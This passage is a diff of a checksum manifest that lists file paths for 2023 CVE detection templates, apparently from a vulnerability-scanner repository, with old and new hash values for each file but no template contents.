+http/cves/2023/CVE-2023-28432.yaml:f58e470004f1d630158498724b2f3da592d8e239 +http/cves/2023/CVE-2023-28662.yaml:2abc573c9c427499910d2f2bf8e1df2054b36ffa +http/cves/2023/CVE-2023-28665.yaml:24a723b670bc1b3caf8fd461db06c6bd0d6e777f +http/cves/2023/CVE-2023-29084.yaml:53bb68cddf14ad14c675ea5000aea77e262b85a9 +http/cves/2023/CVE-2023-29298.yaml:108ee89e60348eee5337de28270b459a9b6d026b +http/cves/2023/CVE-2023-29300.yaml:966564784afefc7242bb44896d3fbfe7fe4404ac +http/cves/2023/CVE-2023-29357.yaml:8e303b57335b68a26186d19e776abfad5ecaa2bd +http/cves/2023/CVE-2023-29439.yaml:af7ce0ffcdeb120f84b8b6830db8e9e9e371a2f1 +http/cves/2023/CVE-2023-2948.yaml:7d521c83108d6c531128fd1e74c901a706b1935e +http/cves/2023/CVE-2023-29489.yaml:f60b01457d4b477ee696f93ddb2e30f326199c03 +http/cves/2023/CVE-2023-2949.yaml:bc04bcfa8a442507b21e06302481027378a377de +http/cves/2023/CVE-2023-29622.yaml:2e564b7bda7d640e39fac1933c50864584e35622 +http/cves/2023/CVE-2023-29623.yaml:f15162a4115311b0bc6b8fb6cd695eccd0d24bdf +http/cves/2023/CVE-2023-2982.yaml:45bc262a664404b8ce1c2095d2334b5bb727b2ba +http/cves/2023/CVE-2023-29827.yaml:c15a74c6266ecc649b994d35dcecf59ad32be5e4 +http/cves/2023/CVE-2023-29887.yaml:af9539787a7cf27ecc50593e77d29cd13ce9d5a7 +http/cves/2023/CVE-2023-29919.yaml:5c2c936f07167fa7dbd94388c6cfefca3ba163ec +http/cves/2023/CVE-2023-29922.yaml:2a03061feb29ae93404e8320e7c63333fb58bc09 +http/cves/2023/CVE-2023-29923.yaml:dedb7e0cdac4d0e63c1558d538f5809d61275682 +http/cves/2023/CVE-2023-30013.yaml:ac3c0f858a056ad35b10f220f83aa3f958acb4a7 +http/cves/2023/CVE-2023-30019.yaml:069417784eeeef2c4959a294cf9e0b92d1f45305 +http/cves/2023/CVE-2023-30150.yaml:189b89309f2ab8d59a6ef495c376449e2ac293ac +http/cves/2023/CVE-2023-30210.yaml:0f5dd2db899de17ca8b212e6041bd624873fdbfd +http/cves/2023/CVE-2023-30212.yaml:9163e8ec19a1bf4cfdd0155156bd6ce6f153d82d +http/cves/2023/CVE-2023-30256.yaml:71711039f3cb6107e806ed08d98a5036c84084cb +http/cves/2023/CVE-2023-30258.yaml:07f7ea3461b41bd4da542b84d2b7498ebb399ea0 +http/cves/2023/CVE-2023-30534.yaml:bf7eebcc4d7fa40e9ab8c834575b17f0c33837c9 +http/cves/2023/CVE-2023-30625.yaml:277f7151436a4b50fecc6745ab46954d96c42ff3 +http/cves/2023/CVE-2023-3077.yaml:a503e8b074518b7a630c790c4bcf5096c83dafbc +http/cves/2023/CVE-2023-30777.yaml:db4827dfa54fec6242ce9ea4c772addb723391e8 +http/cves/2023/CVE-2023-30868.yaml:848d6ae085a1d58172cc7cb997ac51d688c3cd21 +http/cves/2023/CVE-2023-30943.yaml:9400ebc63cca40f491a4765089051822f49ab048 +http/cves/2023/CVE-2023-31059.yaml:ed6ed4b07a7aba43ea08d5b1001192a03a96d434 +http/cves/2023/CVE-2023-31446.yaml:2ffab63d38fd32eb0e649311f4e7238a9279a061 +http/cves/2023/CVE-2023-31465.yaml:84b38d7e29d648c19439f6fb1e2b2a94f40a361a +http/cves/2023/CVE-2023-31548.yaml:9b2972a6c1a4ddcbc803f5471758804aa305e539 +http/cves/2023/CVE-2023-32077.yaml:101a39d9204f5baf01f2affa1fb80cc72890b87f http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b -http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca +http/cves/2023/CVE-2023-3219.yaml:c46ed7525586b1c547845920673b96a6e86127a0 http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818 -http/cves/2023/CVE-2023-32243.yaml:bcbf1f8b9ae1c03a606866feaffa2c71ba08878b -http/cves/2023/CVE-2023-32315.yaml:4006dcea314168a66f3d898049017ac193275066 -http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 -http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a -http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c -http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 -http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:a80c20db1df0f1413c0f14c1d90a40138b305dec -http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc -http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 -http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 -http/cves/2023/CVE-2023-33629.yaml:7aea9ab46b0fc26a84341bf7b4f668fcab8cc28c -http/cves/2023/CVE-2023-3368.yaml:5ece2a45a0b0a28ef3af6a6a7fd25b7acfdbe6c7 -http/cves/2023/CVE-2023-33831.yaml:0a2a23223fc63497dc033c19e0b6e7661f7c0c06 -http/cves/2023/CVE-2023-34020.yaml:cc755f57124860a886c31aacf364b0d14ac9cb71 -http/cves/2023/CVE-2023-34124.yaml:4e3e82c80a9fcd2f5c1e1d3e1cee8623bb1f9d04 +http/cves/2023/CVE-2023-32243.yaml:8ae07df0b47534703abacd4d2c9474cca42f155b +http/cves/2023/CVE-2023-32315.yaml:8cf24a6668a033f97bd47995c00cdfbf712cf7f4 +http/cves/2023/CVE-2023-32563.yaml:95800677fc85fb7a2999fc4dc0ecf4e14bdca824 +http/cves/2023/CVE-2023-33338.yaml:c9eed5096c30da7f644c453c160feabc8a4355d9 +http/cves/2023/CVE-2023-33405.yaml:a640122d300395a4e99b838b7d061964f71e2f7e +http/cves/2023/CVE-2023-33439.yaml:8a4ef47375c4439dba0466e6fb47fb8db3a6bbec +http/cves/2023/CVE-2023-33440.yaml:374a71661f7cb91affcdf607230fed081f768e1e +http/cves/2023/CVE-2023-3345.yaml:cb4f16c52525fd9d663107fa526a3b492ebe2f51 +http/cves/2023/CVE-2023-33510.yaml:99678e95f4277c8a99b1dc46a24ca66e629a223a +http/cves/2023/CVE-2023-33568.yaml:f46aad9a8833fa3fd49afb682fbdacd7059e3f66 +http/cves/2023/CVE-2023-33584.yaml:eafc5fa5e6d962f60a0d1c322d0c5da4a2729a86 +http/cves/2023/CVE-2023-33629.yaml:13e85760aa63f2c8756ecec84fbe8e154b50a41e +http/cves/2023/CVE-2023-3368.yaml:dba7d3e69bd350c5b5abfcf5c0fabaa0af3f1d93 +http/cves/2023/CVE-2023-33831.yaml:4d063581ef083cada73ee70f294f1ce4ab5aea08 +http/cves/2023/CVE-2023-34020.yaml:8703548ce5bb1c081556a2765db8d12b798a1e12 +http/cves/2023/CVE-2023-34124.yaml:ed112c5205c463f82545b656dfff5121e3980c08 http/cves/2023/CVE-2023-34192.yaml:9ec18d446637d67669489485e338d8bb08e3e95a -http/cves/2023/CVE-2023-34259.yaml:c522d53c7b0766136d4356c8330eb60fbe2ff6a7 -http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c -http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c -http/cves/2023/CVE-2023-34598.yaml:586bd46c54d95b6e72b3840c99dd993b235c68b8 -http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3 -http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289 -http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80 -http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6 -http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5 -http/cves/2023/CVE-2023-34753.yaml:a00f3be744f311682d287745befc1f2791ff048a -http/cves/2023/CVE-2023-34755.yaml:722ed8e491656a0e3658aa09b661840b2d0976be -http/cves/2023/CVE-2023-34756.yaml:0b047d7507c88393767381e7fe2ddf08284642a8 -http/cves/2023/CVE-2023-3479.yaml:6f3bf666456a848c581cd6287fa4540e27356940 -http/cves/2023/CVE-2023-34843.yaml:c6ee0f338d06e64df059f27d46987949cc0ca00a -http/cves/2023/CVE-2023-34960.yaml:a66475a23377f21213abfe5ced7ddb1f8e3fd0fe -http/cves/2023/CVE-2023-34993.yaml:6f7c7fa7cff8cd4cd2edc84b56e54e93f4d55e22 -http/cves/2023/CVE-2023-35078.yaml:8feaee8f6f5d9a212d65db4fb49a3e869d59ea2d -http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae -http/cves/2023/CVE-2023-35158.yaml:93718c34c9acb11a626e4076fe6f21953401b5a4 -http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd -http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 -http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 -http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 -http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 -http/cves/2023/CVE-2023-36284.yaml:8b045d86f4ab7fd4d1dfb171450a2cc5bc9d270c -http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 -http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 -http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 -http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b -http/cves/2023/CVE-2023-36347.yaml:80107e418716ca04fb08977e478af1dde95045f3 -http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 -http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 -http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef -http/cves/2023/CVE-2023-3710.yaml:b2be8a781103b6505a95ec075e384c01ca46d9cf -http/cves/2023/CVE-2023-37265.yaml:f4fd0861590c0f3e9ef2cd2449b9bbd4b180e78e -http/cves/2023/CVE-2023-37266.yaml:29dca60c3b36905d26cbcb336995e2db7af88535 -http/cves/2023/CVE-2023-37270.yaml:7021ddf67a9a7d0e223fd0058f39f9d9d93ee50d -http/cves/2023/CVE-2023-37462.yaml:e95ff52904870987f3f2724849653753f3004ca5 -http/cves/2023/CVE-2023-37474.yaml:1382e6f8734c475fdfa9ac81718c3240fbb2153a -http/cves/2023/CVE-2023-37580.yaml:05c627b76d0ee6c8933ae7718273170cb1d01328 -http/cves/2023/CVE-2023-37629.yaml:1c11ce54a7c84be5200d518fd211de5122cef10d -http/cves/2023/CVE-2023-3765.yaml:fe25e60403d8d565e54e667bfa00fa3bec54380e -http/cves/2023/CVE-2023-37679.yaml:4b98e576c7009ac3b16b275285e047004ba4c40d -http/cves/2023/CVE-2023-37728.yaml:95a98690b4984e97751535c02f678dd53be471dd -http/cves/2023/CVE-2023-37979.yaml:24cc2256d77fd5d0ab9605e461faf49360dfa8f7 -http/cves/2023/CVE-2023-38035.yaml:31898b98cb997d4a88c0165c477a6f4a184397a6 -http/cves/2023/CVE-2023-38203.yaml:1907d7665cc9279b963fffc01fd5ca596579e404 -http/cves/2023/CVE-2023-38205.yaml:aaebf7cec9d2c43b5320476d015492a3f0e63e2c -http/cves/2023/CVE-2023-3836.yaml:3f6dbda40801fd34f5a41e95b84b0ee21c28dfd2 -http/cves/2023/CVE-2023-3843.yaml:107a648ee00f910c70584d6bcc276fb07f8c9626 -http/cves/2023/CVE-2023-38433.yaml:a36bbc02d17405903a77d1eca481abcde4613ee2 +http/cves/2023/CVE-2023-34259.yaml:53d252753ec9ffdb7385613c9fc1e7acff11f706 +http/cves/2023/CVE-2023-34362.yaml:2defe48ad70af441465ed508caaed981af0825c6 +http/cves/2023/CVE-2023-34537.yaml:de72e5d681a186ec3cd07866bd4ecbfa04344976 +http/cves/2023/CVE-2023-34598.yaml:31027299b822e6295019acf7ef142e50f6403be0 +http/cves/2023/CVE-2023-34599.yaml:1b3ef5d79d30b77550a4ebc0c4875257044f4360 +http/cves/2023/CVE-2023-3460.yaml:b7708c9ebad15739adf807650decba11fdb4ebaa +http/cves/2023/CVE-2023-34659.yaml:c30ad12e28880774e76add398eb672ed3e25a615 +http/cves/2023/CVE-2023-34751.yaml:8f9603914eb7aef1f81029aad80eb71604fa6dab +http/cves/2023/CVE-2023-34752.yaml:ff56504570eafb7792b5799e419679656609b222 +http/cves/2023/CVE-2023-34753.yaml:b7656cee1fb99f2107f0f738982662e8d7245b58 +http/cves/2023/CVE-2023-34755.yaml:3a3d1170074407156af957173fcd4a173163c75e +http/cves/2023/CVE-2023-34756.yaml:d1bc6393c9d7d9a7ad126dccc9df44bd169631b6 +http/cves/2023/CVE-2023-3479.yaml:0784a947aedebf06be9a59489f27e9809c6008ba +http/cves/2023/CVE-2023-34843.yaml:0f887df5018fcee007d9f4db1d230225d5ea5429 +http/cves/2023/CVE-2023-34960.yaml:4ac0866851e925322a4a45731b61aa1501f86812 +http/cves/2023/CVE-2023-34993.yaml:c900dca1572604053d61238fc052ef56f323d53b +http/cves/2023/CVE-2023-35078.yaml:b75286479f8e1d29956fdc7f9bc5ee75a449e9a6 +http/cves/2023/CVE-2023-35082.yaml:11b40acb6631fbeeaad7d0c53ffd73674010acb0 +http/cves/2023/CVE-2023-35158.yaml:d454ecf18e745f94f94e6ff53c024b4b567f17e2 +http/cves/2023/CVE-2023-35813.yaml:0c33f2cf908fb846444a9fe52e35ca988bbf45da +http/cves/2023/CVE-2023-35843.yaml:c1cc99b3a57a4224468c01aa6d71f3981711d543 +http/cves/2023/CVE-2023-35844.yaml:a25d1bfaa4d327f10d8e159876db043e4c12175c +http/cves/2023/CVE-2023-35885.yaml:83ea672d69a4e29cad43d7cf700a6d66c303c77b +http/cves/2023/CVE-2023-36144.yaml:71762c73decead0fc42e87a1e98f35a0b2529822 +http/cves/2023/CVE-2023-36284.yaml:6fdaf3119a0013f4533b6dc092188b8567774c24 +http/cves/2023/CVE-2023-36287.yaml:c521ad2d7d5ae1a871ebc35a4a15500462bbdb11 +http/cves/2023/CVE-2023-36289.yaml:3807badb58850b7acaaa06c11970e71dad06574a +http/cves/2023/CVE-2023-36306.yaml:13fb2c5b6a1653c9d9cb736ae4f782904737c268 +http/cves/2023/CVE-2023-36346.yaml:5791a6c2d336e3c899310082fda7b0c9ac10a92d +http/cves/2023/CVE-2023-36347.yaml:f684d219d03696666a15e76924aa7a5383753f39 +http/cves/2023/CVE-2023-36844.yaml:7dcd305c47dc04179ef10d8b3552a45aa16f5583 +http/cves/2023/CVE-2023-36845.yaml:a2d752e8d1ec8fc36029a21f54bb220bb9dc20da +http/cves/2023/CVE-2023-36934.yaml:10b5d186463b5f198af80ab025fe671eb1c77284 +http/cves/2023/CVE-2023-3710.yaml:bc15cfc8edecec55aada5edd5c261fb8d9212500 +http/cves/2023/CVE-2023-37265.yaml:00e3b3910291fd4c79d55a3662377f4f2cf4ddec +http/cves/2023/CVE-2023-37266.yaml:34c2063be8df16c0ba77ed1ef3b07dbf2af5ac16 +http/cves/2023/CVE-2023-37270.yaml:5419bb3c958b79043c409f887734b1912584232a +http/cves/2023/CVE-2023-37462.yaml:19ab85bbc2977b2891531e89feeba5ef66cb0ea6 +http/cves/2023/CVE-2023-37474.yaml:40bed5fd8b2c00e3ef251d18f8f02aaf30cf58f8 +http/cves/2023/CVE-2023-37580.yaml:c938dbecf98604df0f634282ec5b6219cbb94039 +http/cves/2023/CVE-2023-37629.yaml:4e68a34b5807294d0241d68a115e89609dc07174 +http/cves/2023/CVE-2023-3765.yaml:0c32fc7c9f67d3a5f4614a438d72e5b78486cc55 +http/cves/2023/CVE-2023-37679.yaml:1477d84b685e9596a4683b888bba12ef45315dc3 +http/cves/2023/CVE-2023-37728.yaml:ae8eefeec6f7ac2a1ae096f19cbccefa1f0d1b72 +http/cves/2023/CVE-2023-37979.yaml:c1db6eb563e1c4c88b768ddbf4134c0557c04161 +http/cves/2023/CVE-2023-38035.yaml:1e6f26ae79f4e647ad6e36692754f8c2e7e42531 +http/cves/2023/CVE-2023-38203.yaml:4abdf0b503ac93b779418c3dbc0be249193c6b21 +http/cves/2023/CVE-2023-38205.yaml:685f22ade81e6cd487981e113b06f7941d429806 +http/cves/2023/CVE-2023-3836.yaml:c55fd698b64e14277abada54ba78e8e8ab1610f6 +http/cves/2023/CVE-2023-3843.yaml:f1b1ed4a3ba55a1e6a6675d1cf6c9b4bc52b43a7 +http/cves/2023/CVE-2023-38433.yaml:8af19ca4d3a95914d516737976c68b75cc940e2f http/cves/2023/CVE-2023-3844.yaml:41358b9a547fc658630cd5192e8f5fd24359d2b1 -http/cves/2023/CVE-2023-3845.yaml:6b4b360583bd9f5ffad3d12b005765017d6dc4b4 +http/cves/2023/CVE-2023-3845.yaml:a058fa56bd9afd4c7fe9039d01299be7f2b0387b http/cves/2023/CVE-2023-3846.yaml:4ed1668afe32b491fdc55b828e4a5611c0967f44 -http/cves/2023/CVE-2023-3847.yaml:5ab9a60983bb1598cd708019b18e532841ec7772 -http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af -http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52 -http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8 -http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab -http/cves/2023/CVE-2023-38964.yaml:03b48ad92119668fb6e83bb4d65f686be71735de -http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7 -http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3 -http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882 -http/cves/2023/CVE-2023-39109.yaml:fa658d913fd94a0c2aa9371b3a48232f299057e0 -http/cves/2023/CVE-2023-39110.yaml:438e5a17629cb1800f6c53b4313a9e93c97248ea +http/cves/2023/CVE-2023-3847.yaml:19741808d71bd63c323ccebb3f1d2ba9ef1de84d +http/cves/2023/CVE-2023-3848.yaml:2ee0f1cd35093ecbc95d6463be4d7c0b96be887d +http/cves/2023/CVE-2023-3849.yaml:f55bec87afdb536995985bc94a3a789752373543 +http/cves/2023/CVE-2023-38501.yaml:7d6a6df111f2736db6f28c4f5b8f70bc26903486 +http/cves/2023/CVE-2023-38646.yaml:cc57e9d1027bbe9145a4a8e1f1e88156deb06350 +http/cves/2023/CVE-2023-38964.yaml:e1c3467ec6d109844705546205c87d038110b216 +http/cves/2023/CVE-2023-39002.yaml:52ebe9dff5ee28922febf801a3bb95030da8acad +http/cves/2023/CVE-2023-39026.yaml:041116b66d543937bdc51c4430296fb2a3b5b8a3 +http/cves/2023/CVE-2023-39108.yaml:c1b83450ef1e0a64d4b9d9eae5406929006b9806 +http/cves/2023/CVE-2023-39109.yaml:127b33851616ea34701f58d253e55e469a64571d +http/cves/2023/CVE-2023-39110.yaml:de40021a1ae0f2751f435cc3884f568ce795422a http/cves/2023/CVE-2023-39120.yaml:fe50f8e80ac67803942ed0b7fd0204e8f1fadbfc -http/cves/2023/CVE-2023-39141.yaml:bc88d2b87ea3588e113375c468f3110966db9e99 -http/cves/2023/CVE-2023-39143.yaml:54033c211aa0242597737d53de3b07a9bb548363 -http/cves/2023/CVE-2023-3936.yaml:7b2e238b1483242fedc77cd468f0c60f05b5ecbb -http/cves/2023/CVE-2023-39361.yaml:f28752fc93eaf34fa6ee0d92fd8b41279a894b3f -http/cves/2023/CVE-2023-39598.yaml:40946b09a3f8dde729d593ed391d6e45799e8a42 -http/cves/2023/CVE-2023-39600.yaml:f774a24fbab476153d8a33f4383444010e06ee68 -http/cves/2023/CVE-2023-39676.yaml:329b171fd9c8d0287ce60590e181b91c5489fc0f -http/cves/2023/CVE-2023-39677.yaml:10f9751e17d7ff258e3fc9de4b87c359d1f4473c -http/cves/2023/CVE-2023-39700.yaml:9129c0e52271b65b3befbd566a9c83d5c6d9b271 -http/cves/2023/CVE-2023-39796.yaml:cedf5e17d369ec6c9680c9d1b34263ace14b06a3 -http/cves/2023/CVE-2023-40208.yaml:1dd48591ad77fecbe10a9145b424a7c13df680a9 -http/cves/2023/CVE-2023-40355.yaml:480982185506d4e2514ca70e859469a3d6feaea8 -http/cves/2023/CVE-2023-40779.yaml:50ffb7b2d8996d5463b0dcd49b39f289b1bf5cb0 -http/cves/2023/CVE-2023-4110.yaml:83a5412a8658f0cfa575c1afef4ff9f72fd13adc -http/cves/2023/CVE-2023-41109.yaml:909503a144166c013a019c308f03f54245d977a4 -http/cves/2023/CVE-2023-4111.yaml:967c8b8cfc36a18075d01be1bd4f060385725170 -http/cves/2023/CVE-2023-4112.yaml:8472826ad9a2195b2ae87e16a3c751e5a9d59b53 -http/cves/2023/CVE-2023-4113.yaml:2a95405a7a3839030aaf13fb9682016ab1a8c6bc -http/cves/2023/CVE-2023-4114.yaml:f8f216cd98f2a0dc8a41cb9a68559a909fdca8ee -http/cves/2023/CVE-2023-4115.yaml:4d4f4999a961cd853c83f4677593e1129d1d492c -http/cves/2023/CVE-2023-4116.yaml:fbf413721a65ce055a6a488c01acbc3210e4165a -http/cves/2023/CVE-2023-41265.yaml:221d460584c48862bd02b6a95adb57495072bf8a -http/cves/2023/CVE-2023-41266.yaml:cdd799d3d68f3f4d0f9b35b859b85a0cc46c3569 -http/cves/2023/CVE-2023-4148.yaml:99d9cb706be2516854e4eaf6adb2198ceb81d70c -http/cves/2023/CVE-2023-41538.yaml:05fef92bc65dfc377d8e2bd4e748854008d15f83 -http/cves/2023/CVE-2023-41642.yaml:85e9a87e453bca32dc0d6a26d2bb9cd6ab76cd1b -http/cves/2023/CVE-2023-4168.yaml:4f8a8609015bf5238de8c60244a261ff1cc0c718 -http/cves/2023/CVE-2023-4169.yaml:779d2305e6e0e6059b2c41a9f8424c1bebef4d6b -http/cves/2023/CVE-2023-4173.yaml:0693b2d54c9eb5c68a1cda96d07e0eeea6e65863 -http/cves/2023/CVE-2023-4174.yaml:0482b030fdc2e3690dcbda6c9174670b44030826 -http/cves/2023/CVE-2023-41763.yaml:85f07f1f1e1cbf13286e651671373096d437ac18 -http/cves/2023/CVE-2023-41892.yaml:26004dc155f05de0936d3fbaf9ba9d01ddb0af9d +http/cves/2023/CVE-2023-39141.yaml:107751338e25ebbd981829c2d937e9a1f8f60c31 +http/cves/2023/CVE-2023-39143.yaml:e20d6dbb9d5c577e44cf112ff83030e9e694bc11 +http/cves/2023/CVE-2023-3936.yaml:8286c086051a0b10e973d57c92c958e57a5257dd +http/cves/2023/CVE-2023-39361.yaml:3e466a41d9e0eade6589f47678451baf6ebbbebc +http/cves/2023/CVE-2023-39598.yaml:b6cbf6f5f31905988a1568ec0ad02d638a60c8a5 +http/cves/2023/CVE-2023-39600.yaml:f594f2061238379154bf97dcf1ff8830362c94b4 +http/cves/2023/CVE-2023-39676.yaml:6ae66310705d77a801f51b24c4f23badc1f9ffd9 +http/cves/2023/CVE-2023-39677.yaml:ccad01e66e9c6cbfa8c85c6946710f37fb4be991 +http/cves/2023/CVE-2023-39700.yaml:f31e713f3b9d4e03948d00ad0d94e84fc08d13d3 +http/cves/2023/CVE-2023-39796.yaml:652e2a7957da667b3dd805940d9de12d10e0ce7e +http/cves/2023/CVE-2023-40208.yaml:d26fb10881a5128ffe3884f4ae0c5df84784fd98 +http/cves/2023/CVE-2023-40355.yaml:e830e5b4bfdd4361ebf7066155078da07a178821 +http/cves/2023/CVE-2023-40779.yaml:79d01a88f26d82c5f4256632542249ca4e6ae608 +http/cves/2023/CVE-2023-4110.yaml:0093d833acd76053a647314f2896e274d1254cff +http/cves/2023/CVE-2023-41109.yaml:58697d5ce98d5cc1842596763241100ff1afb0b4 +http/cves/2023/CVE-2023-4111.yaml:ae83919e66a9f5addc96ea0f7f859e8c08ff9115 +http/cves/2023/CVE-2023-4112.yaml:f148ae909334c925f571ce9de4ce07fabfb16d89 +http/cves/2023/CVE-2023-4113.yaml:389451cef87bb8ffaabfc8213665370d035280e1 +http/cves/2023/CVE-2023-4114.yaml:a22313e17040379001d1e9eef07dc34529e2249b +http/cves/2023/CVE-2023-4115.yaml:0eb9bb4aaea99ff7103d00edb065f20f52a7d2eb +http/cves/2023/CVE-2023-4116.yaml:e91e80aad8c3b22ff58d3a6535088b3a36f284af +http/cves/2023/CVE-2023-41265.yaml:5f472d26913bc18ac633b38588b85a1346d74bb6 +http/cves/2023/CVE-2023-41266.yaml:71f32d9b3d35beba978e80492799b8e3ebeebaef +http/cves/2023/CVE-2023-4148.yaml:49e8f3a0a99a43b86cf98bf0aa5987008f76118f +http/cves/2023/CVE-2023-41538.yaml:c9051b5fe3e82378f98ff3d81323ec2b7c0f09ed +http/cves/2023/CVE-2023-41642.yaml:45ca13061c37fa3cd5e207717a72a365a1387207 +http/cves/2023/CVE-2023-4168.yaml:9155e9ec28f2164a98ee91eb94a8068c65893efe +http/cves/2023/CVE-2023-4169.yaml:52b490d095332be0ae34ac4b731f5e9e717fc128 +http/cves/2023/CVE-2023-4173.yaml:86e4e5336155967198130352e74e6959e95444b6 +http/cves/2023/CVE-2023-4174.yaml:fa3a8f00b09fc61884d81b2d8b65086459cb417c +http/cves/2023/CVE-2023-41763.yaml:fd53172133c81d605446ea08aba8b5c917baad00 +http/cves/2023/CVE-2023-41892.yaml:4eb18a27213425ee06bf5bf2d68c9d59d7cf6189 http/cves/2023/CVE-2023-42343.yaml:c1bffaa8664049b88b3f225dccf9b3e372fdf1bd http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 -http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9 -http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf -http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4 -http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f -http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 -http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 -http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 -http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d -http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f -http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 -http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb -http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e -http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 -http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 -http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166 -http/cves/2023/CVE-2023-44813.yaml:8807d3e1cce247d7ccef3184d516c55213edd2a3 -http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b -http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e -http/cves/2023/CVE-2023-4542.yaml:d7b83fe18ec05683bd8001dcb749dd505d93c3ff -http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 -http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 -http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf -http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e -http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 -http/cves/2023/CVE-2023-45855.yaml:4a15e64df3b4a6fff79a7989929ea4e47e96c964 -http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb -http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:45e9463fdbd5e2ec433e92f26e86c456fae42ffa -http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 -http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 -http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c -http/cves/2023/CVE-2023-46805.yaml:0291b05889fcafa128183288afb7bd84e7db4b00 